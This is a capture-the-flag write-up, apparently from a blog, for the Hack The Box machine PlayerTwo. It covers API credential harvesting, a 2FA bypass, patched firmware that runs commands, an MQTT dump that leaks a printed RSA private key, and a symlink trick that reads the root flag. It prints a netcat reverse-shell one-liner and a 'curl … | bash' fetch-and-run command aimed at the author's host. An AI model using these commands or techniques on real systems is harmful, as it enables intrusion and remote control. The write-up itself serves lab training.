HTB: PlayerTwo

Details

This machine is Player Two from Hack The Box

Recon

Nmap segfaulted while scanning this, so I used masscan

kali@kali:~$ sudo masscan --router-ip 10.10.14.0 -p0-65535,U:0-65535 -e tun0 --rate=1000 10.10.10.170
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-26 13:18:14 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131072 ports/host]
Discovered open port 22/tcp on 10.10.10.170
Discovered open port 80/tcp on 10.10.10.170
Discovered open port 8545/tcp on 10.10.10.170

And then nmap on the found ports

kali@kali:~$ nmap -sVC -p22,80,8545 10.10.10.170
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 13:24 GMT
Nmap scan report for 10.10.10.170
Host is up (0.022s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 0e:7b:11:2c:5e:61:04:6b:e8:1c:bb:47:b8:4d:fe:5a (RSA)
|   256 18:a0:87:56:64:06:17:56:4d:6a:8c:79:4b:61:56:90 (ECDSA)
|_  256 b6:4b:fc:e9:62:08:5a:60:e0:43:69:af:29:b3:27:14 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
8545/tcp open  http    (PHP 7.2.24-0ubuntu0.18.04.1)
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 26 Feb 2020 13:26:00 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1
|     Content-Type: application/json
|     {"code":"bad_route","msg":"no handler for path "/nice%20ports%2C/Tri%6Eity.txt%2ebak"","meta":{"twirp_invalid_route":"GET /nice%20ports%2C/Tri%6Eity.txt%2ebak"}}
|   GetRequest:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 26 Feb 2020 13:25:52 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1
|     Content-Type: application/json
|     {"code":"bad_route","msg":"no handler for path "/"","meta":{"twirp_invalid_route":"GET /"}}
|   HTTPOptions:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 26 Feb 2020 13:25:52 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1
|     Content-Type: application/json
|     {"code":"bad_route","msg":"no handler for path "/"","meta":{"twirp_invalid_route":"OPTIONS /"}}
|   OfficeScan:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 26 Feb 2020 13:26:01 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.24-0ubuntu0.18.04.1
|     Content-Type: application/json
|_    {"code":"bad_route","msg":"no handler for path "/"","meta":{"twirp_invalid_route":"GET /"}}
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8545-TCP:V=7.80%I=7%D=2/26%Time=5E56719E%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,FC,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Wed,\x2026\x2
SF:0Feb\x202020\x2013:25:52\x20GMT\r\nConnection:\x20close\r\nX-Powered-By
SF::\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nContent-Type:\x20application/j
SF:son\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"no\x20handler\x20for\x20pa
SF:th\x20\\\"\\/\\\"\",\"meta\":{\"twirp_invalid_route\":\"GET\x20\\/\"}}"
SF:)%r(HTTPOptions,100,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Wed,\
SF:x2026\x20Feb\x202020\x2013:25:52\x20GMT\r\nConnection:\x20close\r\nX-Po
SF:wered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nContent-Type:\x20appli
SF:cation/json\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"no\x20handler\x20f
SF:or\x20path\x20\\\"\\/\\\"\",\"meta\":{\"twirp_invalid_route\":\"OPTIONS
SF:\x20\\/\"}}")%r(FourOhFourRequest,144,"HTTP/1\.1\x20404\x20Not\x20Found
SF:\r\nDate:\x20Wed,\x2026\x20Feb\x202020\x2013:26:00\x20GMT\r\nConnection
SF::\x20close\r\nX-Powered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04\.1\r\nCont
SF:ent-Type:\x20application/json\r\n\r\n{\"code\":\"bad_route\",\"msg\":\"
SF:no\x20handler\x20for\x20path\x20\\\"\\/nice%20ports%2C\\/Tri%6Eity\.txt
SF:%2ebak\\\"\",\"meta\":{\"twirp_invalid_route\":\"GET\x20\\/nice%20ports
SF:%2C\\/Tri%6Eity\.txt%2ebak\"}}")%r(OfficeScan,FC,"HTTP/1\.1\x20404\x20N
SF:ot\x20Found\r\nDate:\x20Wed,\x2026\x20Feb\x202020\x2013:26:01\x20GMT\r\
SF:nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.24-0ubuntu0\.18\.04
SF:\.1\r\nContent-Type:\x20application/json\r\n\r\n{\"code\":\"bad_route\"
SF:,\"msg\":\"no\x20handler\x20for\x20path\x20\\\"\\/\\\"\",\"meta\":{\"tw
SF:irp_invalid_route\":\"GET\x20\\/\"}}");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds

Foothold

I started at http://10.10.10.170/

Screenshot 1

This was actually an image, but it leaked

MrR3boot@player2.htb

So I added the domain to hosts and went to http://player2.htb/

Screenshot 2

Screenshot 3

The link actually goes to

http://product.player2.htb/home

So I added that domain to hosts and went to http://product.player2.htb/index

Screenshot 4

I didn't have any creds at this point, so I ran a dirbust against the product domain

Screenshot 5

Api looked interesting, but was 403ing. So for now I moved onto port 8545, which from the nmap scan looked to be running twirp

kali@kali:~$ curl http://player2.htb:8545/
{"code":"bad_route","msg":"no handler for path \"\/\"","meta":{"twirp_invalid_route":"GET \/"}}

I then ended up reading a fair amount of documentation at

One of which told me I should find the service definition in /proto/service.proto of the webserver so I tried http://player2.htb/proto/service.proto

Screenshot 7

This gave a 404, but I tried seeing if the proto folder itself existed http://player2.htb/proto/

Screenshot 8

The switch to 403 indicated it did, so I fuzzed the folder for the .proto file

kali@kali:~$ wfuzz --hc 404 -c -z file,/usr/share/wordlists/dirbuster/directory-list-1.0.txt http://player2.htb/proto/FUZZ.proto

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://player2.htb/proto/FUZZ.proto
Total requests: 141708

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

[SNIP]
000029535:   200        18 L     46 W     266 Ch      "generated"
[SNIP]

And went to http://player2.htb/proto/generated.proto

Screenshot 9

So I want to access the GenCreds endpoint

kali@kali:~$ curl -s -X POST -H "Content-Type: application/json" http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds | json_pp
{
   "code" : "internal",
   "meta" : [],
   "msg" : "failed to parse request json"
}

The endpoint is there, I just need to use it properly. From the definition, I need to send a variable called Number which contains an int "count" that is greater than 0

kali@kali:~$ curl -s -X POST -H "Content-Type:application/json" --data '{"Number":1}' http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds | json_pp
{
   "name" : "jkr",
   "pass" : "XHq7_WJTA?QD_?E2"
}

Some creds, I tried them on http://product.player2.htb/

Screenshot 10

So I tried the rpc again

curl -s -X POST -H "Content-Type:application/json" --data '{"Number":1}' http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds | json_pp
{
   "name" : "snowscan",
   "pass" : "XHq7_WJTA?QD_?E2"
}

New ones, so I tried repeatedly

kali:~$ curl -s -X POST -H "Content-Type:application/json" --data '{"Number":1}' http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds | json_pp
{
   "name" : "jkr",
   "pass" : "ze+EKe-SGF^5uZQX"
}

kali:~$ curl -s -X POST -H "Content-Type:application/json" --data '{"Number":1}' http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds | json_pp
{
   "name" : "mprox",
   "pass" : "tR@dQnwnZEk95*6#"
}

kali:~$ curl -s -X POST -H "Content-Type:application/json" --data '{"Number":1}' http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds | json_pp
{
   "name" : "mprox",
   "pass" : "XHq7_WJTA?QD_?E2"
}

It almost seemed to be giving me a username and password, but maybe not the correct pair. So I ran this repeatedly until I stopped getting new ones. Resulting in the following

Usernames:
jkr
snowscan
mprox
0xdf

Passwords:
XHq7_WJTA?QD_?E2
ze+EKe-SGF^5uZQX
tR@dQnwnZEk95*6#
Lp-+Q8umLW5*7qkc

So I began to try them in various combinations on the login page, and when I tried

jkr : Lp-+Q8umLW5*7qkc

Screenshot 11

I had been redirected to /topt and needed to bypass 2fa. The rpc service had no reference to this, so I began to look at the /api endpoint on http://product.player2.htb. After a bit of fuzzing and guesswork I found /api/topt

kali@kali:~$ curl http://product.player2.htb/api/totp
{"error":"Cannot GET \/"}

It seemed to not like GET requests

kali@kali:~$ curl -X POST http://product.player2.htb/api/totp
{"error":"Invalid Session"}

Tried adding my session cookie

kali@kali:~$ curl -X POST --cookie "PHPSESSID=6n0enci5glmq0jdpq2uqevo2ee" http://product.player2.htb/api/totp
{"error":"Invalid action"}

So I tried adding a parameter called action

kali@kali:~$ curl -X POST --cookie "PHPSESSID=6n0enci5glmq0jdpq2uqevo2ee" -H "Content-Type:application/json" --data '{"action":""}' 'http://product.player2.htb/api/totp'
{"error":"Missing parameters"}

This part took a while, but eventually I re-read the 2FA page and it stood out that you can enter "backup codes". So I tried an action for backup codes

kali@kali:~$ curl -X POST --cookie "PHPSESSID=6n0enci5glmq0jdpq2uqevo2ee" -H "Content-Type:application/json" --data '{"action":"backup_codes"}' 'http://product.player2.htb/api/totp'
{"user":"jkr","code":"29389234823423"}

Using the creds from before, and this backup code, I logged in

Screenshot 12

The access section had a link to a pdf

Screenshot 13

I followed the link to http://product.player2.htb/protobs.pdf

Screenshot 14

Screenshot 15

Screenshot 16

There is a tar file linked, and a link to a page where you can "sanity check". I downloaded the tar and viewed the sanity check page http://product.player2.htb/protobs/

Screenshot 17

This says they take the file and run it in a sandbox to verify it. Next I looked at the tar to see what it actually does

kali@kali:~$ file protobs_firmware_v1.0.tar
protobs_firmware_v1.0.tar: gzip compressed data, last modified: Sun Dec  1 07:30:27 2019, from Unix, original size modulo 2^32 30720

kali@kali:~$ tar xvf protobs_firmware_v1.0.tar
info.txt
Protobs.bin
version

kali:~$ strings Protobs.bin
[SNIP]
[!] Protobs: Signing failed...
[!] Protobs: Service shutting down...
[!] Protobs: Unexpected unrecoverable error!
[!] Protobs: Service exiting now...
stty raw -echo min 0 time 10
stty sane
[*] Protobs: User input detected. Launching Dev Console Utility
  ___         _       _
 | _ \_ _ ___| |_ ___| |__ ___
 |  _/ '_/ _ \  _/ _ \ '_ (_-<
 |_| |_| \___/\__\___/_.__/__/
                              v1.0 Beta
[*] Protobs: Firmware booting up.
[*] Protobs: Fetching configs...
[SNIP]

Now, I tested modifying these strings in the raw .bin file and uploaded them, it turns out it still passes the signature check. Although I made sure to not change the length of any of them

stty raw -echo min 0 time 10

Is a shell command, so hopefully it gets run into something like system, it is 24 characters, as is

echo "y"|nc 10.10.14.27 4444

So I modified the string and re-created the tar file

kali@kali:~$ tar cvzf mine.tar Protobs.bin info.txt version

I then set a listener

kali@kali:~$ nc -nvlp 4444

I then uploaded the file

Screenshot 22

Screenshot 23

Screenshot 24

Screenshot 25

When I checked the listener

connect to [10.10.14.27] from (UNKNOWN) [10.10.10.170] 51670
y

So I had conenct back, but no space for a working reverse shell. So I instead hosted a file containining the following

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.27 4444 >/tmp/f

And modified the bin file to run

curl 10.10.14.27/revs | bash

I repeated the upload process and checked my listener

connect to [10.10.14.27] from (UNKNOWN) [10.10.10.170] 51702
/bin/dash: 0: can't access tty; job control turned off
$

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@player2:/var/www/product/protobs$

I now had a foodhold on the machine

User

Looking for next steps I found observer was the only user with a home directory

www-data@player2:/home/observer$ ls -la
ls -la
total 40
drwxr-xr-x 6 observer observer 4096 Nov 16 15:19 .
drwxr-xr-x 3 root     root     4096 Jul 27  2019 ..
lrwxrwxrwx 1 observer observer    9 Sep  5 03:52 .bash_history -> /dev/null
-rw-r--r-- 1 observer observer  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 observer observer 3771 Apr  4  2018 .bashrc
drwx------ 2 observer observer 4096 Nov 16 15:19 .cache
drwx------ 3 observer observer 4096 Nov 16 15:19 .gnupg
-rw-r--r-- 1 observer observer  807 Apr  4  2018 .profile
drwx------ 2 observer observer 4096 Sep  7 18:16 .ssh
drwxr-x--- 2 observer observer 4096 Dec 17 10:47 Development
-r-------- 1 observer observer   33 Sep  5 03:44 user.txt

And it had the user flag. So that became my target. I checked what ports the machine has open

www-data@player2:/$ netstat -plnt
netstat -plnt
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:1883          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8545            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -

Something was listening on 1883 internally. Some googled revealed this could be MQTT. So I moved a static version of socat over to the machine, and used it to expose this port to my machine

www-data@player2:/tmp$ ./socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.0.1:1883 &

I then found a script online for dumping MQTT comms https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b

import paho.mqtt.client as mqtt

def on_connect(client, userdata, flags, rc):
   print "[+] Connection successful"
   client.subscribe('#', qos = 1)
   client.subscribe('$SYS/#')

def on_message(client, userdata, msg):
   print '[+] Topic: %s - Message: %s' % (msg.topic, msg.payload)

client = mqtt.Client(client_id = "MqttClient")
client.on_connect = on_connect
client.on_message = on_message
client.connect('10.10.10.170', 8888, 60)
client.loop_forever()

I ran this and after a while

[SNIP]
[+] Topic: $SYS/internal/firmware/signing - Message: -----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA7Gc/OjpFFvefFrbuO64wF8sNMy+/7miymSZsEI+y4pQyEUBA
R0JyfLk8f0SoriYk0clR/JmY+4mK0s7+FtPcmsvYgReiqmgESc/brt3hDGBuVUr4
et8twwy77KkjypPy4yB0ecQhXgtJNEcEFUj9DrOq70b3HKlfu4WzGwMpOsAAdeFT
+kXUsGy+Cp9rp3gS3qZ2UGUMsqcxCcKhn92azjFoZFMCP8g4bBXUgGp4CmFOtdvz
SM29st5P4Wqn0bHxupZ0ht8g30TJd7FNYRcQ7/wGzjvJzVBywCxirkhPnv8sQmdE
+UAakPZsfw16u5dDbz9JElNbBTvwO9chpYIs0QIDAQABAoIBAA5uqzSB1C/3xBWd
62NnWfZJ5i9mzd/fMnAZIWXNcA1XIMte0c3H57dnk6LtbSLcn0jTcpbqRaWtmvUN
wANiwcgNg9U1vS+MFB7xeqbtUszvoizA2/ScZW3P/DURimbWq3BkTdgVOjhElh6D
62LlRtW78EaVXYa5bGfFXM7cXYsBibg1+HOLon3Lrq42j1qTJHH/oDbZzAHTo6IO
91TvZVnms2fGYTdATIestpIRkfKr7lPkIAPsU7AeI5iAi1442Xv1NvGG5WPhNTFC
gw4R0V+96fOtYrqDaLiBeJTMRYp/eqYHXg4wyF9ZEfRhFFOrbLUHtUIvkFI0Ya/Y
QACn17UCgYEA/eI6xY4GwKxV1CvghL+aYBmqpD84FPXLzyEoofxctQwcLyqc5k5f
llga+8yZZyeWB/rWmOLSmT/41Z0j6an0bLPe0l9okX4j8WOSmO6TisD4WiFjdAos
JqiQej4Jch4fTJGegctyaOwsIVvP+hKRvYIwO9CKsaAgOQySlxQBOwMCgYEA7l+3
JloRxnCYYv+eO94sNJWAxAYrcPKP6nhFc2ReZEyrPxTezbbUlpAHf+gVJNVdetMt
ioLhQPUNCb3mpaoP0mUtTmpmkcLbi3W25xXfgTiX8e6ZWUmw+6t2uknttjti97dP
QFwjZX6QPZu4ToNJczathY2+hREdxR5hR6WrJpsCgYEApmNIz0ZoiIepbHchGv8T
pp3Lpv9DuwDoBKSfo6HoBEOeiQ7ta0a8AKVXceTCOMfJ3Qr475PgH828QAtPiQj4
hvFPPCKJPqkj10TBw/a/vXUAjtlI+7ja/K8GmQblW+P/8UeSUVBLeBYoSeiJIkRf
PYsAH4NqEkV2OM1TmS3kLI8CgYBne7AD+0gKMOlG2Re1f88LCPg8oT0MrJDjxlDI
NoNv4YTaPtI21i9WKbLHyVYchnAtmS4FGqp1S6zcVM+jjb+OpBPWHgTnNIOg+Hpt
uaYs8AeupNl31LD7oMVLPDrxSLi/N5o1I4rOTfKKfGa31vD1DoCoIQ/brsGQyI6M
zxQNDwKBgQCBOLY8aLyv/Hi0l1Ve8Fur5bLQ4BwimY3TsJTFFwU4IDFQY78AczkK
/1i6dn3iKSmL75aVKgQ5pJHkPYiTWTRq2a/y8g/leCrvPDM19KB5Zr0Z1tCw5XCz
iZHQGq04r9PMTAFTmaQfMzDy1Hfo8kZ/2y5+2+lC7wIlFMyYze8n8g==
-----END RSA PRIVATE KEY-----
[SNIP]

An ssh key showed up, I saved this and used it for observer

kali@kali:~# ssh observer@10.10.10.170 -i ./priv.key
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.2.5-050205-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Feb 26 23:03:12 UTC 2020

  System load:  0.01               Processes:            188
  Usage of /:   26.1% of 19.56GB   Users logged in:      0
  Memory usage: 38%                IP address for ens33: 10.10.10.170
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

121 packages can be updated.
5 updates are security updates.

Last login: Sun Dec  1 15:33:19 2019 from 172.16.118.129
observer@player2:~$

observer@player2:~$ cat user.txt
[REDACTED]

Root

Note: For root I found what I believe was the intended path, but did not complete it as I found an unintentional method to leak the root flag. I do intend to return to this machine and complete the intended method in future and will update this writeup when I do

observer@player2:~/Development$ cd /opt/Configuration_Utility/
observer@player2:/opt/Configuration_Utility$ ls -la
total 2164
drwxr-x--- 2 root observer    4096 Nov 16 15:23 .
drwxr-xr-x 3 root root        4096 Dec 17 10:47 ..
-rwxr-xr-x 1 root root      179032 Nov 15 15:57 ld-2.29.so
-rwxr-xr-x 1 root root     2000480 Nov 15 15:57 libc.so.6
-rwsr-xr-x 1 root root       22440 Dec 17 13:41 Protobs

A suid binary as root, with it's interpreter and libc available with it. I extracted copies of these and tested the binary after patching it to use the new libc location

kali@kali@~$ patchelf --set-rpath .:$ORIGIN ./Protobs
kali@kali@~$ patchelf Protobs --set-interpreter ./ld-2.29.so
kali@kali@~$ ldd Protobs
        linux-vdso.so.1 (0x00007fff9abe0000)
        libc.so.6 => ./libc.so.6 (0x00007f3f65566000)
        ./ld-2.29.so => /lib64/ld-linux-x86-64.so.2 (0x00007f3f65753000)
kali@kali@~$ ./Protobs

[*] Protobs: Service booting up.
[*] Protobs: Fetching configs...

  ___         _       _
 | _ \_ _ ___| |_ ___| |__ ___
 |  _/ '_/ _ \  _/ _ \ '_ (_-<
 |_| |_| \___/\__\___/_.__/__/
                              v1.0 Beta

protobs@player2:~$ help

[!] Invalid option. Enter '0' for available options.

protobs@player2:~$ 0

==Options=========
 1 -> List Available Configurations
 2 -> Create New Configuration
 3 -> Read a Configuration
 4 -> Delete a Configuration
 5 -> Exit Service
==================
protobs@player2:~$ 1

==List of Configurations

protobs@player2:~$ 2

==New Game Configuration
 [ Game                ]: test
 [ Contrast            ]: test
 [ Gamma               ]: test
 [ Resolution X-Axis   ]: test
 [ Resolution Y-Axis   ]: test
 [ Controller          ]: test
 [ Size of Description ]: 100
 [ Description         ]: test
protobs@player2:~$ 1

==List of Configurations
 [00] : test
protobs@player2:~$ 3

==Read Game Configuration
 >>> Run the list option to see available configurations.
 [ Config Index    ]: 0
  [ Game                ]: test
  [ Contrast            ]: 0
  [ Gamma               ]: 0
  [ Resolution X-Axis   ]: 0
  [ Resolution Y-Axis   ]: 0
  [ Controller          ]: 0
  [ Description         ]: test
protobs@player2:~$ 4

==Delete Game Configuration
 >>> Run the list option to see available configurations.
 [ Config Index    ]: 0

protobs@player2:~$ 1

So it lets you make, view and delete game configs. This app is a pretty classic style for a heap corruption challenge, but before I dug much more into it I found the unintended method to leak the flag. The ssh key being read by MQTT was observers, once I was logged in as observer I was able to modify the id_rsa file. But the process reading the file runs as root. As such I backed up the original id_rsa and replaced it with a symlink to /root/root.txt

observer@player2:~/.ssh$ ln -s /root/root.txt id_rsa

Then checked my MQTT dumping script

[+] Topic: $SYS/internal/firmware/signing - Message: [REDACTED]

The root flag showed up in the MQTT

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.